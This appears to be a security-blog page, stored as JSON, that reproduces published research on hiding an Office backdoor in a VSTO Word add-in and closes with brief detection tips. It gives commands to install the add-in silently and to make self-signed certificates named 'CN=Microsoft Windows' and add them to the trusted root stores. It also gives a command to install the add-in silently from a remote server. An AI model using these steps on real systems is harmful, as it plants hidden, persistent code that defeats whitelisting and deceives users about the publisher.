[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fojYI23gGv07DDcwuSsu64fkv7F5AAYr3Pfcnw65QvHM":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},529,"What is VSTO and how can it be used to implement an Office backdoor?","VSTO (Visual Studio Tools for Office) is a framework for customizing Office applications with add-ins. Attackers can create a VSTO add-in (e.g., a Word Add-in) that executes malicious code when Office starts. As detailed in [Office backdoor implemented using VSTO](\u002Fnews\u002Foffice-backdoor-implemented-using-vsto), this provides a stealthy persistence mechanism that loads even when macros are disabled.","\u003Cp>VSTO (Visual Studio Tools for Office) is a framework for customizing Office applications with add-ins. Attackers can create a VSTO add-in (e.g., a Word Add-in) that executes malicious code when Office starts. As detailed in [Office backdoor implemented using VSTO](\u002Fnews\u002Foffice-backdoor-implemented-using-vsto), this provides a stealthy persistence mechanism that loads even when macros are disabled.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Foffice-backdoor-implemented-using-vsto\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-vsto-and-how-can-it-be-used-to-implement-an-office-backdoor-1777483356344","VSTO, Office backdoor, persistence, add-in",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},131,"Office backdoor implemented using VSTO","office-backdoor-implemented-using-vsto","Learn how to implement an Office backdoor using VSTO, bypass whitelisting, and detect such threats. Step-by-step exploitation and security analysis.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>--\u003C\u002Fp>\u003Cp>Recently, I read an article titled 'VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules', which introduced a method of implementing an Office backdoor using VSTO. In my previous articles 'Use Office to maintain persistence' and 'Office Persistence on x64 operating system', I had studied Office backdoors. This article will combine my research insights to reproduce this method, analyze the exploitation approach, share practical exploitation techniques, and finally introduce how to identify such backdoors.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fbohops.com\u002F2018\u002F01\u002F31\u002Fvsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>VSTO development methods\u003C\u002Fli>\u003Cli>Practical exploitation approaches\u003C\u002Fli>\u003Cli>Backdoor detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 VSTO Development Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction to VSTO\u003C\u002Fh3>\u003Cp>Full name Visual Studio Tools for Office\u003C\u002Fp>\u003Cp>Used to customize Office applications, capable of interacting with Office controls\u003C\u002Fp>\u003Cp>Integrated in the Visual Studio installation package\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017970940_0_0b315721fa.jpeg\">\u003C\u002Fp>\u003Ch3>2. VSTO Development\u003C\u002Fh3>\u003Cp>This section reproduces the content of 'VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules'\u003C\u002Fp>\u003Ch4>(1) Create a new project\u003C\u002Fh4>\u003Cp>Visual C# -&gt; Office -&gt; Word 2010 Add-in\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017978338_1_3033b8ad85.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Add code\u003C\u002Fh4>\u003Cp>Add reference System.Windows.Forms\u003C\u002Fp>\u003Cp>Add pop-up box code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.Windows.Forms;\u003Cbr>MessageBox.Show(\"1\");\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017987691_2_4d474c1d12.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Compilation\u003C\u002Fh4>\u003Cp>Set the corresponding .Net version, compile, and generate the following 6 files:\u003C\u002Fp>\u003Cul>\u003Cli>Microsoft.Office.Tools.Common.v4.0.Utilities.dll\u003C\u002Fli>\u003Cli>Microsoft.Office.Tools.Common.v4.0.Utilities.xml\u003C\u002Fli>\u003Cli>WordAddIn2.dll\u003C\u002Fli>\u003Cli>WordAddIn2.dll.manifest\u003C\u002Fli>\u003Cli>WordAddIn2.pdb\u003C\u002Fli>\u003Cli>WordAddIn2.vsto\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(4) Install the add-in\u003C\u002Fh4>\u003Cp>Execute WordAddIn2.vsto\u003C\u002Fp>\u003Cp>A dialog box prompts that the publisher cannot be verified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017992652_3_30d2187971.jpeg\">\u003C\u002Fp>\u003Cp>Select installation\u003C\u002Fp>\u003Cp>View Control Panel -&gt; Programs -&gt; Programs and Features, where the newly installed add-in can be found\u003C\u002Fp>\u003Ch4>(5) Open word.exe, the add-in loads automatically\u003C\u002Fh4>\u003Cp>Popup dialog, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017996349_4_00ce38c567.jpeg\">\u003C\u002Fp>\u003Cp>View Word add-ins, the loaded add-in WordAddIn2 can be seen, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017999349_5_3d694f2e56.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the installation of the Office backdoor is successfully completed\u003C\u002Fp>\u003Ch2>0x03 Practical Exploitation Ideas\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For practical exploitation, the installation process must first be interface-free, so to bypass the popup prompt about unverified publisher, the following improvements are needed:\u003C\u002Fp>\u003Ch4>(1) Command-line installation of VSTO add-in\u003C\u002Fh4>\u003Cp>Using VSTOInstaller.exe\u003C\u002Fp>\u003Cp>Included after system installation of Office, default path %ProgramFiles%\\Common Files\\microsoft shared\\VSTO\\10.0\u003C\u002Fp>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cp>\u002Fi: Install\u003C\u002Fp>\u003Cp>\u002Fu: Uninstall\u003C\u002Fp>\u003Cp>\u002Fs: Silent operation; if a trust prompt is required, custom items will not be installed or updated\u003C\u002Fp>\u003Cp>Installation parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe\" \u002Fi \u002Fs c:\\test\\WordAddIn2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation failed because the publisher could not be verified due to a trust prompt\u003C\u002Fp>\u003Ch4>(2) Bypass publisher verification\u003C\u002Fh4>\u003Cp>VSTO add-ins provide signature functionality, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018003277_6_eb91348a85.jpeg\">\u003C\u002Fp>\u003Cp>Manually generate a set of signature certificates using the following tools\u003C\u002Fp>\u003Cul>\u003Cli>makecert.exe\u003C\u002Fli>\u003Cli>cert2spc.exe\u003C\u002Fli>\u003Cli>pvk2pfx.exe\u003C\u002Fli>\u003Cli>certmgr.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>From the Windows SDK, reference download addresses:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Generation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>makecert -n \"CN=Microsoft Windows\" -r -sv Root.pvk Root.cer\u003Cbr>cert2spc Root.cer Root.spc\u003Cbr>pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, four files are generated: Root.cer, Root.pfx, Root.pvk, Root.spc\u003C\u002Fp>\u003Cp>Replace the certificate for the WordAddIn2 plugin, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018008360_7_9e68f0b08a.jpeg\">\u003C\u002Fp>\u003Cp>Certificate registration (administrator privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>certmgr.exe -add Root.cer -c -s -r localMachine TrustedPublisher\u003Cbr>certmgr.exe -add -c Root.cer -s -r localmachine root\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The certificate must be added to both TrustedPublisher and root\u003C\u002Fp>\u003Cp>Reinstalling the VSTO plugin will not be blocked\u003C\u002Fp>\u003Ch4>(3) Remote installation\u003C\u002Fh4>\u003Cp>VSTOInstaller.exe supports remote installation\u003C\u002Fp>\u003Cp>VSTO add-ins can be placed on a remote web server\u003C\u002Fp>\u003Cp>The installation parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe\" \u002Fs \u002Fi http:\u002F\u002F192.168.62.131\u002F1\u002FWordAddIn1.vsto\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the actual exploitation process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Generate a VSTO add-in\u003C\u002Fli>\u003Cli>Sign the add-in\u003C\u002Fli>\u003Cli>Certificate registration\u003C\u002Fli>\u003Cli>Remote download and installation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Backdoor Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Check Control Panel -&gt; Programs -&gt; Programs and Features for any suspicious add-ins\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>VSTO add-ins do not create new key values in the registry uninstall configuration location (HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\)\u003C\u002Fp>\u003Cp>2. Check Office's COM add-ins\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Disabling macros does not prevent VSTO add-ins from loading\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests methods for implementing Office backdoors using VSTO, analyzes detection approaches based on practical exploitation ideas\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>--\u003C\u002Fp>\u003Cp>Recently, I read an article titled 'VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules', which introduced a method of implementing an Office backdoor using VSTO. In my previous articles 'Use Office to maintain persistence' and 'Office Persistence on x64 operating system', I had studied Office backdoors. This article will combine my research insights to reproduce this method, analyze the exploitation approach, share practical exploitation techniques, and finally introduce how to identify such backdoors.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fbohops.com\u002F2018\u002F01\u002F31\u002Fvsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>VSTO development methods\u003C\u002Fli>\u003Cli>Practical exploitation approaches\u003C\u002Fli>\u003Cli>Backdoor detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 VSTO Development Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction to VSTO\u003C\u002Fh3>\u003Cp>Full name Visual Studio Tools for Office\u003C\u002Fp>\u003Cp>Used to customize Office applications, capable of interacting with Office controls\u003C\u002Fp>\u003Cp>Integrated in the Visual Studio installation package\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017970940_0_0b315721fa-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. VSTO Development\u003C\u002Fh3>\u003Cp>This section reproduces the content of 'VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules'\u003C\u002Fp>\u003Ch4>(1) Create a new project\u003C\u002Fh4>\u003Cp>Visual C# -&gt; Office -&gt; Word 2010 Add-in\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017978338_1_3033b8ad85-1.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Add code\u003C\u002Fh4>\u003Cp>Add reference System.Windows.Forms\u003C\u002Fp>\u003Cp>Add pop-up box code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.Windows.Forms;\u003Cbr>MessageBox.Show(\"1\");\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017987691_2_4d474c1d12-1.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Compilation\u003C\u002Fh4>\u003Cp>Set the corresponding .Net version, compile, and generate the following 6 files:\u003C\u002Fp>\u003Cul>\u003Cli>Microsoft.Office.Tools.Common.v4.0.Utilities.dll\u003C\u002Fli>\u003Cli>Microsoft.Office.Tools.Common.v4.0.Utilities.xml\u003C\u002Fli>\u003Cli>WordAddIn2.dll\u003C\u002Fli>\u003Cli>WordAddIn2.dll.manifest\u003C\u002Fli>\u003Cli>WordAddIn2.pdb\u003C\u002Fli>\u003Cli>WordAddIn2.vsto\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(4) Install the add-in\u003C\u002Fh4>\u003Cp>Execute WordAddIn2.vsto\u003C\u002Fp>\u003Cp>A dialog box prompts that the publisher cannot be verified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017992652_3_30d2187971-1.jpeg\">\u003C\u002Fp>\u003Cp>Select installation\u003C\u002Fp>\u003Cp>View Control Panel -&gt; Programs -&gt; Programs and Features, where the newly installed add-in can be found\u003C\u002Fp>\u003Ch4>(5) Open word.exe, the add-in loads automatically\u003C\u002Fh4>\u003Cp>Popup dialog, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017996349_4_00ce38c567-1.jpeg\">\u003C\u002Fp>\u003Cp>View Word add-ins, the loaded add-in WordAddIn2 can be seen, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017999349_5_3d694f2e56-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the installation of the Office backdoor is successfully completed\u003C\u002Fp>\u003Ch2>0x03 Practical Exploitation Ideas\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For practical exploitation, the installation process must first be interface-free, so to bypass the popup prompt about unverified publisher, the following improvements are needed:\u003C\u002Fp>\u003Ch4>(1) Command-line installation of VSTO add-in\u003C\u002Fh4>\u003Cp>Using VSTOInstaller.exe\u003C\u002Fp>\u003Cp>Included after system installation of Office, default path %ProgramFiles%\\Common Files\\microsoft shared\\VSTO\\10.0\u003C\u002Fp>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cp>\u002Fi: Install\u003C\u002Fp>\u003Cp>\u002Fu: Uninstall\u003C\u002Fp>\u003Cp>\u002Fs: Silent operation; if a trust prompt is required, custom items will not be installed or updated\u003C\u002Fp>\u003Cp>Installation parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe\" \u002Fi \u002Fs c:\\test\\WordAddIn2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation failed because the publisher could not be verified due to a trust prompt\u003C\u002Fp>\u003Ch4>(2) Bypass publisher verification\u003C\u002Fh4>\u003Cp>VSTO add-ins provide signature functionality, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018003277_6_eb91348a85-1.jpeg\">\u003C\u002Fp>\u003Cp>Manually generate a set of signature certificates using the following tools\u003C\u002Fp>\u003Cul>\u003Cli>makecert.exe\u003C\u002Fli>\u003Cli>cert2spc.exe\u003C\u002Fli>\u003Cli>pvk2pfx.exe\u003C\u002Fli>\u003Cli>certmgr.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>From the Windows SDK, reference download addresses:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Generation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>makecert -n \"CN=Microsoft Windows\" -r -sv Root.pvk Root.cer\u003Cbr>cert2spc Root.cer Root.spc\u003Cbr>pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, four files are generated: Root.cer, Root.pfx, Root.pvk, Root.spc\u003C\u002Fp>\u003Cp>Replace the certificate for the WordAddIn2 plugin, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018008360_7_9e68f0b08a-1.jpeg\">\u003C\u002Fp>\u003Cp>Certificate registration (administrator privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>certmgr.exe -add Root.cer -c -s -r localMachine TrustedPublisher\u003Cbr>certmgr.exe -add -c Root.cer -s -r localmachine root\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The certificate must be added to both TrustedPublisher and root\u003C\u002Fp>\u003Cp>Reinstalling the VSTO plugin will not be blocked\u003C\u002Fp>\u003Ch4>(3) Remote installation\u003C\u002Fh4>\u003Cp>VSTOInstaller.exe supports remote installation\u003C\u002Fp>\u003Cp>VSTO add-ins can be placed on a remote web server\u003C\u002Fp>\u003Cp>The installation parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe\" \u002Fs \u002Fi http:\u002F\u002F192.168.62.131\u002F1\u002FWordAddIn1.vsto\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the actual exploitation process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Generate a VSTO add-in\u003C\u002Fli>\u003Cli>Sign the add-in\u003C\u002Fli>\u003Cli>Certificate registration\u003C\u002Fli>\u003Cli>Remote download and installation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Backdoor Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Check Control Panel -&gt; Programs -&gt; Programs and Features for any suspicious add-ins\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>VSTO add-ins do not create new key values in the registry uninstall configuration location (HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\)\u003C\u002Fp>\u003Cp>2. Check Office's COM add-ins\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Disabling macros does not prevent VSTO add-ins from loading\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests methods for implementing Office backdoors using VSTO, analyzes detection approaches based on practical exploitation ideas\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1042,"Onedaysec",3,"published","2026-02-02T07:51:00.064Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Office Backdoor via VSTO: Exploitation & Detection Guide","VSTO backdoor, Office persistence, application whitelisting bypass, VSTOInstaller, Office security",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],532,531,530,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.868Z","2026-07-23T16:01:42.013Z","draft","2026-07-23T16:13:03.564Z"]